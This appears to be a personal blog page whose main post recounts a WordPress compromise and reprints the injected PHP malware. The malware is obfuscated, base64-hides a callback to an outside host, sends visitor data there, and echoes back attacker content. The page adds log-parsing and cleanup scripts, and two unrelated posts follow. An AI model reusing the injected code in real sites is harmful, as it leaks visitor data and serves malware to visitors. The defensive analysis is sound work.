WordPress Sites all HACKED!
Posted on February 9, 2012 by Jexley
It’s been a while since I’ve updated, and that’s a shame, because I’ve had a lot of stuff happen to me and I sometimes have a lot of neat shit to say.
But, the News Headline is: “ALL MY WORDPRESS SITES WERE HACKED.”
I went through each of these sites and found that the only things they had in common were that they’re WordPress and most (but not all) had the “All in One SEO” plugin.
- Some had different versions, though none lower than 2.8 (most were 3.3.1, the latest).
- Some had different file permissions on the “wp-content” folder (777 on some, 666 on a few, 555 on others).
- Some are hosted on Windows servers, most on Linux.
- Some were set up by others, most set up by me.
There are other similarities, I’m sure, probably as many as there are differences.
Regardless, here’s how they got in…
From my log files (FTP and general):
```
/home/jexanaly/ftpchk3.php a _ i r [mainftpaccount] ftp 1 * c Mon Feb 06 07:49:31
```
Where [mainftpaccount] is the name of my main FTP account. They put the “ftpchk3.php” file and “counter.php” in the root from the IP 61.191.190.51 and then, within half an hour, they started hitting my site with a download and then an immediate upload of every index.php file in ALL of my folders… from this IP: 188.138.112.15
They had to be targeting WordPress though, because they also went into each of my WordPress Theme Folders and edited the “footer.php” file and “home.php” if it existed (in addition to “index.php”).
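The log line above is an xferlog-style FTP transfer record (the date has been shifted to the end by whatever produced the copy). As an added example, not part of the original post, here is a small parser and two detections that would have surfaced exactly what the post describes: uploads of web-executable files to the account, and a host downloading a file and re-uploading it moments later (the mass index.php rewrite). It assumes the standard wu-ftpd/ProFTPD xferlog field order; the sample lines are constructed, with invented sizes, account name and a third visitor address, reusing only the filenames and the two IPs the post reports.

```python
"""Flag suspicious FTP transfers in xferlog-style transfer logs (added example)."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed sample. xferlog field order: date (5 tokens), transfer-time, remote-host,
# bytes, filename, transfer-type, special-action, direction (i = client uploaded to the
# server, o = client downloaded), access-mode, username, service, auth-method,
# auth-user-id, completion-status.
SAMPLE_XFERLOG = """\
Mon Feb 06 07:49:31 2012 1 61.191.190.51 1873 /home/jexanaly/ftpchk3.php a _ i r mainftpaccount ftp 1 * c
Mon Feb 06 07:49:40 2012 1 61.191.190.51 2210 /home/jexanaly/counter.php a _ i r mainftpaccount ftp 1 * c
Mon Feb 06 08:15:02 2012 1 188.138.112.15 4096 /home/jexanaly/public_html/index.php a _ o r mainftpaccount ftp 1 * c
Mon Feb 06 08:15:04 2012 1 188.138.112.15 6140 /home/jexanaly/public_html/index.php a _ i r mainftpaccount ftp 1 * c
Mon Feb 06 09:30:11 2012 3 203.0.113.7 51200 /home/jexanaly/public_html/wp-content/uploads/photo.jpg b _ i r mainftpaccount ftp 1 * c
"""

# Extensions a typical PHP host will execute if someone requests them over HTTP.
WEB_EXEC_SUFFIXES = (".php", ".phtml", ".php3", ".php5", ".phar")


@dataclass
class Transfer:
    when: datetime
    host: str
    filename: str
    direction: str  # "i" = incoming (upload), "o" = outgoing (download)
    user: str


def parse_xferlog(text: str) -> List[Transfer]:
    """Parse xferlog lines; records with too few fields are skipped."""
    records = []
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) < 18:
            continue
        when = datetime.strptime(" ".join(tokens[:5]), "%a %b %d %H:%M:%S %Y")
        # The filename may contain spaces: it is everything between the byte
        # count and the nine trailing fixed-position fields.
        records.append(Transfer(
            when=when,
            host=tokens[6],
            filename=" ".join(tokens[8:-9]),
            direction=tokens[-7],
            user=tokens[-5],
        ))
    return records


def web_executable_uploads(transfers: List[Transfer]) -> List[Transfer]:
    """Uploads of files the web server would execute (the ftpchk3.php / counter.php drop)."""
    return [t for t in transfers
            if t.direction == "i" and t.filename.lower().endswith(WEB_EXEC_SUFFIXES)]


def download_then_reupload(transfers: List[Transfer],
                           window: timedelta = timedelta(minutes=30)) -> List[Tuple[str, str, float]]:
    """Same host downloads a file and uploads it again within `window`: the
    'pull index.php, modify, push it back' pattern. Returns (host, filename, seconds)."""
    last_download: Dict[Tuple[str, str], datetime] = {}
    pairs = []
    for t in sorted(transfers, key=lambda x: x.when):
        key = (t.host, t.filename)
        if t.direction == "o":
            last_download[key] = t.when
        elif t.direction == "i" and key in last_download:
            gap = t.when - last_download[key]
            if gap <= window:
                pairs.append((t.host, t.filename, gap.total_seconds()))
    return pairs


def uploads_per_host(transfers: List[Transfer]) -> Dict[str, int]:
    """Upload volume by remote host; a handful of addresses doing all the writing stands out."""
    counts: Dict[str, int] = {}
    for t in transfers:
        if t.direction == "i":
            counts[t.host] = counts.get(t.host, 0) + 1
    return counts


if __name__ == "__main__":
    recs = parse_xferlog(SAMPLE_XFERLOG)
    for t in web_executable_uploads(recs):
        print(f"PHP upload  {t.when}  {t.host}  {t.filename}  (user {t.user})")
    for host, name, secs in download_then_reupload(recs):
        print(f"Rewrite     {host}  {name}  re-uploaded {secs:.0f}s after download")
```

Run it against a real xferlog by replacing SAMPLE_XFERLOG with the file contents; the two IPs it reports here are the ones from the post, and the photo upload from the third address is correctly ignored because a .jpg is not executable.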
They put this ratbagbastardshit code into each of those files:
```php
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
// Note the inverted logic: the callback fires only when NONE of these strings appear
// in the user agent, i.e. for ordinary IE/Firefox visitors, and is skipped for
// crawlers, Opera, Chrome and Safari, so search engines never see the payload.
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
// The base64 string decodes to http://hotlogupdate.com/stat/stat.php; the visitor's
// IP, user agent, host and requested path are sent along as query parameters.
$stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle);
// Whatever the remote server returns (when it starts with "O") is echoed
// straight into the page, so the attacker controls the injected HTML.
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
```
This is a cURL call (PHP pulling the content of a URL and echoing it into your page), with the target hidden in that base64 string, to this website: http://hotlogupdate.com/stat/stat.php
DO NOT, REPEAT, DO NOT VISIT THIS WEBSITE.
These scumbagshitwadcrapfaces use the file on that website above to hit you with what’s called an “Exploit Pack” where it’s got just about every virus ever created by some pasty-white 32-year old virgin suckin’ down Mountain Dew and Fritos and trying to take over the world before he levels up or his mom asks him to get his ass out of the basement and clean his room.
So yeah, don’t go there. If you do, you might catch what I got, the “System Check” virus and then the “iexplore.exe” virus.
I fixed “System Check” by restarting into Safe Mode and running MalwareBytes, SuperAntiSpyware, Spybot S&D and CCleaner.
I fixed “iexplore.exe” by loading a six-shooter with one bullet, spinning the chamber, putting the gun to my head, and pulling the trigger. When I realised that I was still alive and that all the crap I’d tried hadn’t worked, I restarted into Safe Mode, ran Combofix.exe (all night too, for despite the fact that it says “Seriously infected systems may take 20 minutes” it was still running 8 hours later…), then ran SuperAntiSpyware, TrojanKiller, MalwareBytes, Spybot, HijackThis, CCleaner (which wipes out too many Windows user settings to be worth it) and then downloaded and installed avast! That seemed to do it, though the handgun would’ve probably been easier.
So, that’s if you’re infected.
If it’s just your poor websites that have gotten hit, then first deny those sunsabiches access from your .htaccess file:
```apache
order allow,deny
allow from all
deny from 61.191.190.
deny from 188.138.112.
```
This will deny the entire IP range (the trailing dot matches every address starting with those three octets). You might miss out on some visitors from China or Amsterdam, but I reckon it’s worth it to avoid the sh*t you’ll get otherwise.
Next, I went through and started fixing the index.php files by getting rid of all that extra code. On 13 infected websites. It took a long time.
When I looked again, those bastardcockfacehells had come back and reinfected all my files, despite the fact that I changed all my FTP passwords.
So, after you restrict their IP and change all your FTP passwords, you should check out this fix I wrote:
MASSIVE DISCLAIMER: This script uses fopen, fread and fwrite so you must have the appropriate folder permissions. It will also rewrite files that are infected, so DO BE CAREFUL. I tested this bugger by unceremoniously truncating every goddam file on the website you are now on, so I know it works for me, but if you mess with any of that code, you’ll probably nuke your site too. So don’t.
- Download the file and unzip it.
- Copy fix-hacker-shit.php to your root directory.
- Go to a browser and punch in “http://www.yoursitehere.com/fix-hacker-shit.php”.
- Crack a beer, watch it work.
If you don’t see anything, then you weren’t infected.
And if you were, isn’t this way much better than going through fifty eleventy brazillian geedarnfickety folders and changing all the index files back?
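The download link for the fix isn’t on this page, so as an added example (my own code, not Judd’s fix-hacker-shit.php) here is a scanner that does the same job from the command line: walk a web root, find the injected block by its `if (!isset($sRetry))` guard, and strip everything up to that block’s closing `?>`. Unlike the post’s script it is dry-run by default and keeps a `.infected.bak` copy of each file it rewrites; `--apply` does the writing and `--all-php` widens the search beyond the three theme files the post names. The infected sample file is constructed (a shortened copy of the injected code in front of a normal theme line), and the base64 string is the one from the injected code above.

```python
"""Find and strip the injected hotlogupdate callback from WordPress PHP files (added example)."""
import base64
import re
import shutil
import sys
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

# base64 string taken from the injected code; decoding it gives the callback URL.
CALLBACK_B64 = "aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA=="

# From the guard to the first "?>" after it (non-greedy). The injected block has no
# "?>" before its own closing tag, so this removes exactly that block plus its newline.
INJECT_RE = re.compile(
    r"<\?php\s*if\s*\(\s*!isset\(\s*\$sRetry\s*\)\s*\).*?\?>[ \t]*\r?\n?", re.DOTALL)

# The post found the code in these theme files; --all-php widens the search.
TARGET_NAMES = {"index.php", "footer.php", "home.php"}

# Constructed sample: shortened copy of the injected block ahead of a legitimate line.
SAMPLE_INFECTED = """<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
$stCurlLink = base64_decode('aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']);
$stCurlHandle = curl_init( $stCurlLink );
}
?>
<?php get_header(); ?>
<h1>Hello</h1>
"""


def decode_callback_url(b64: str = CALLBACK_B64) -> str:
    """The domain the injected code phones home to, recovered from its base64 form."""
    return base64.b64decode(b64).decode("ascii")


def strip_injection(source: str) -> Tuple[str, int]:
    """Return (cleaned source, number of injected blocks removed)."""
    return INJECT_RE.subn("", source)


def scan_tree(root: str, apply: bool = False, all_php: bool = False) -> List[Tuple[str, int]]:
    """Walk root; return [(path, blocks_removed)] for every infected file.
    With apply=True the file is rewritten after copying it to <name>.infected.bak."""
    hits = []
    for path in sorted(Path(root).rglob("*.php")):
        if not all_php and path.name not in TARGET_NAMES:
            continue
        # surrogateescape keeps any odd bytes in theme files intact on the round trip
        text = path.read_bytes().decode("utf-8", errors="surrogateescape")
        cleaned, n = strip_injection(text)
        if n == 0:
            continue
        hits.append((str(path), n))
        if apply:
            shutil.copy2(path, path.with_name(path.name + ".infected.bak"))
            path.write_bytes(cleaned.encode("utf-8", errors="surrogateescape"))
    return hits


def demo() -> Dict[str, object]:
    """Build a throwaway theme tree, clean it, and rescan to confirm nothing remains."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp) / "wp-content" / "themes" / "sample"
        theme.mkdir(parents=True)
        (theme / "index.php").write_text(SAMPLE_INFECTED)
        (theme / "footer.php").write_text("<?php wp_footer(); ?>\n")
        first = scan_tree(tmp, apply=True)
        second = scan_tree(tmp)
        after = (theme / "index.php").read_text()
        return {"hits": len(first), "after_rescan": len(second),
                "cleaned_starts_with_header": after.startswith("<?php get_header(); ?>"),
                "backup_kept": (theme / "index.php.infected.bak").exists()}


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    apply = "--apply" in sys.argv
    for p, n in scan_tree(root, apply=apply, all_php="--all-php" in sys.argv):
        print(f"{'cleaned' if apply else 'INFECTED'} {p} ({n} block{'s' if n > 1 else ''})")
```

Usage: `python clean_injected.py /path/to/webroot` lists infected files without touching them; add `--apply` once the list looks right. Do the IP block and the FTP password change first, as the post says, or the files will simply be rewritten again.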
Now, for those of you that Googled and Googled and couldn’t find a blasted thing on this subject, here’s some keywords to help others get here:
- fix wordpress hack php code
- wordpres website hacked
- how to fix wp hack
- cleanup code from wordpress hack
- yummy tasty republican cheerleaders (kidding Googs, KIDDING! Don’t taze me bro)
That’s it. I hope some or all of this helps.
Good Luck and Have a Good Website.
-Judd
Category: Resources | 33 Comments
Refilling ink cartridges – Canon MP160
Posted on November 10, 2010 by Jexley
Okay, here’s the deal. I absolutely REBEL against the idea that two cartridges cost more than my printer. I know, I know, that’s how they make their money, but still. Henry Ford said about his cars, "If I could be guaranteed people would buy all their parts from me, I’d give ‘em away!" So there you go. Rampant consumerism and Planned Obsolescence.
*steps down off soapbox*
So I’ve got an old Canon Pixma MP160. It does what I need and what I need isn’t much. When it ran out of ink, I got sad, and then I bought some ink squeezy shooter things, and I wasn’t sad any more.
I took the cartridges out, filled ‘em back up with ink with the ink squeezers, and then popped ‘em back in.
Printer fired up, then "E5" is flashing. Well, rather, "E" then "5" and then "E" again. I assumed it was "E5" instead of "E5E5E5", which would mean "light grey" in hexadecimal speak.
I Googled and Googled and banged my head against the desk repeatedly, mostly because the instructions didn’t work and also because the printer is under my desk and I couldn’t reach it, so BANG every time I tried to hit buttons.
Here’s what I had to do every time, and because I keep forgetting it and finding completely inane and/or incomplete instructions on Googs, I’m listing it here, so that the next time I have to do it and I Google "resetting MP160" or "refilling ink cartridges MP160 E5 error" I’ll find some good instructions.
Here goes:
- Unplug printer. Leave it while you whistle a tune or make tea.
- Plug it back in. Plug it into your computer too.
- Press and hold the "Stop/Reset" button and then press the "Power" button. As soon as the "Power" button lights green, release the "Stop/Reset" button and then press it twice.
- Things will start happening. The "Alarm" light will blink intermittently and your printer will sound like it’s booting up. Hit the "Stop/Reset" button sometime during this, only once, and when the printer’s done doing its thing, it’ll show "0" in the counter thingie. If you don’t hit "Stop/Reset" during this, then the little "0" never appears. Nobody told me this.
- NOW hit "Stop/Reset" 4 times, which will alternate the "Alarm" and "Power" buttons lighting up. The "Power" button should be the one that’s lit when you’re done counting.
- Now press "Power" once, twice. Things will blink like it’s saying "Thank You".
- Now hit "Power" again to turn it off.
- Now say a silent prayer to the Gods of Cheapassery, and turn it back on.
- Now print stuff and revel in the $13 you spent on ink instead of the $63 you spent on new cartridges.
Screw you Henry Ford!
Category: Resources | 2 Comments
Jex Member Image Upload Plugin
Posted on May 12, 2010 by Jexley
Plugin Name: Jex Image Upload Page for Members
Plugin URI: http://www.jexanalytics.com.au/plugins/jex-member-image-upload-plugin
Description: Folks that are logged in to a WordPress site can upload images to a general page of the admin’s choosing (by placing "[jex_member_image_upload_form]" on that page). The image gets stored in the "uploads" folder and the Admin then gets an email notification from which they can ‘approve’ or ‘disapprove’ the image.
Version: 1.0
Author: Judd Exley
Author URI: http://www.jexanalytics.com.au/
Requirements: PHPMailer and some other stuff that I haven’t figured out yet.
WordPress Version: 2.1 and up.
INSTALLATION: Simply copy the jex-image-upload-for-members.php file into your /plugins directory and activate it. Then, place [jex_member_image_upload_form] on any page that you want people to be able to upload images to.
NOTES: It only works for one page at a time thus far, so if you put the form on multiple pages, it’ll pull all images that have been approved for the whole site. I haven’t coded it for a "per page" use yet. YET.
UPDATE: Yes, yes it DOES now work on multiple pages. Mostly because IHS Web Solutions wanted that and because I rock hard for them.
Copyright 2013 © Jexley Enterprises - Making web statistics simple.